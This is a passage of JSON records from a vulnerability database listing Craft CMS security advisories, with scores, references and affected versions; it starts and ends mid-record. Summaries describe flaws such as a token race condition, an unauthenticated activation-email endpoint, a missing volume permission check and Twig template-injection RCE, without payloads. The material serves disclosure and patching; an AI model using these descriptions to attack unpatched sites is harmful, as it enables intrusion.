This vulnerability represents an **unpatched variant** of the behavior injection vulnerability addressed in GHSA-255j-qw47-wjh5, affecting different endpoints through a separate code path.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498","reference_id":"","reference_type":"","scores":[{"value":"0.00315","scoring_system":"epss","scoring_elements":"0.54952","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/
UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498","reference_id":"CVE-2026-25498","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498"},{"reference_url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbg
x"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25498","GHSA-7jx7-3846-m7w7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9enr-b6zd-mbh8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50299?format=json","vulnerability_id":"VCID-a3b5-pwyh-yugv","summary":"Craft CMS Race condition in Token Service potentially allows for token usage greater than the token limit\nA Time-of-Check-Time-of-Use (TOCTOU) race condition exists in Craft CMS’s token validation service for tokens that explicitly set a limited usage. 
The `getTokenRoute()` method reads a token’s usage count, checks if it’s within limits, then updates the database in separate non-atomic operations. By sending concurrent requests, an attacker can use a single-use impersonation token multiple times before the database update completes.\n\nTo make this work, an attacker needs to obtain a valid user account impersonation URL with a non-expired token via some other means and exploit a race condition while bypassing any rate-limiting rules in place.\n\nFor this to be a privilege escalation, the impersonation URL must include a token for a user account with more permissions than the current user.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00627","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128","reference_id":"CVE-2026-27128","reference_type":"","scores":[{"va
lue":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128"},{"reference_url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vuln
erability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27128","GHSA-6fx5-5cw5-4897"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a3b5-pwyh-yugv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50678?format=json","vulnerability_id":"VCID-akrv-yqnf-1kg8","summary":"Craft CMS has unauthenticated activation email trigger with potential user enumeration\nThe `actionSendActivationEmail()` endpoint is accessible to unauthenticated users and does not require a permission check for pending users. An attacker with no prior access can trigger activation emails for any pending user account by knowing or guessing the user ID. If the attacker controls the target user’s email address, they can activate the account and gain access to the system.\n\nThe vulnerability is not that anonymous access exists - there’s a legitimate use case for it. The vulnerability is that the endpoint accepts arbitrary `userId` parameters without verifying ownership.\n\nCraft CMS allows public user registration. When a user registers but doesn’t receive their activation email (spam filter, typo correction, etc.), they need a way to request a resend. 
This is why `send-activation-email` is in the `allowAnonymous` array - it’s intentional self-service functionality.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17879","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069","reference_id":"CVE-2026-29069","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069"},{"reference_url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"
HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74442?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode
.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.2"}],"aliases":["CVE-2026-29069","GHSA-234q-vvw3-mrfq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-akrv-yqnf-1kg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95270?format=json","vulnerability_id":"VCID-asek-4gme-gug8","summary":"Craft CMS's Missing Volume Permission Check in AssetsController::actionShowInFolder Allows Information Disclosure\n## Summary\n\n`AssetsController::actionShowInFolder()` fetches an asset by ID and returns its filename and complete folder hierarchy (including volume handle, volume UID, folder names, folder UIDs, and folder URI paths) without checking whether the requesting user has `viewAssets` or `viewPeerAssets` permission on the asset’s volume. Any authenticated CP user — even one with zero volume permissions — can enumerate asset filenames and the full folder structure of any volume by supplying arbitrary asset IDs.\n\nThis follows the exact same incomplete-patch pattern as four GHSAs merged on 2026-02-25 (GHSA-x76w-8c62-48mg, GHSA-vgjg-248p-rfm2, GHSA-5pgf-h923-m958, GHSA-3pvf-vxrv-hh9c), all of which added `requireVolumePermissionByAsset()` + `requirePeerVolumePermissionByAsset()` to sibling AssetsController actions. The `actionShowInFolder` method was introduced thirteen days before the patch wave and was not included in it.\n\n## Details\n\nThe vulnerability is in `src/controllers/AssetsController.php` at line 1437. The method:\n\n1. Calls `requireCpRequest()` — verifies the request targets the CP, enforces `accessCp` permission via `Controller::_enforceAllowAnonymous()`, but does NOT enforce any volume-level permission.\n2. Fetches any asset by ID with `Asset::findOne($assetId)` — no `editable`/`savable` scope filter, so all assets across all volumes are reachable.\n3. 
Returns sensitive structural data via JSON.\n\n## Impact\n\n- Any authenticated control panel user with only `accessCp` permission can discover the filenames and complete folder structure (names, UIDs, handles, URIs) of assets in volumes they are not authorized to access.\n- Sensitive volume structures — private document repositories, confidential media, internal file names — are exposed to any user who can log into the control panel.\n- This enables targeted follow-up attacks: an attacker who knows a private asset’s filename and folder path may have other avenues to exfiltrate the actual file.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44012","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01713","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44012"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:49:35Z/"}],"url":"https://github.com/craftcms/cms/commit/e3f3eaab3d85badd713cfc2c24e5f0792ecdb586"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-33m5-hqp9-97p
w","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:49:35Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-33m5-hqp9-97pw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44012","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44012"},{"reference_url":"https://github.com/advisories/GHSA-33m5-hqp9-97pw","reference_id":"GHSA-33m5-hqp9-97pw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-33m5-hqp9-97pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44012","GHSA-33m5-hqp9-97pw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-asek-4gme-gug8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50613?format=json","vulnerability_id":"VCID-azr5-12f8-hfbm","summary":"Craft CMS has potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, the attacker must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled, which is against Craft CMS' recommendations for any non-dev 
environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, they can have a non-administrator account with `allowAdminChanges` disabled, but they must have access to the System Messages utility.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE.\n\nUsers should update to the patched versions (5.8.22 and 4.16.18) to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/pull/18208","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0618","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gith
ub.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784","reference_id":"CVE-2026-28784","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784"},{"reference_url":"https://github.com/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qc86-q28f-ggww"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url
":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28784","GHSA-qc86-q28f-ggww"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-azr5-12f8-hfbm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56366?format=json","vulnerability_id":"VCID-c2nk-y4rx-1qf4","summary":"Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled\nYou are affected if your php.ini configuration has `register_argc_argv` 
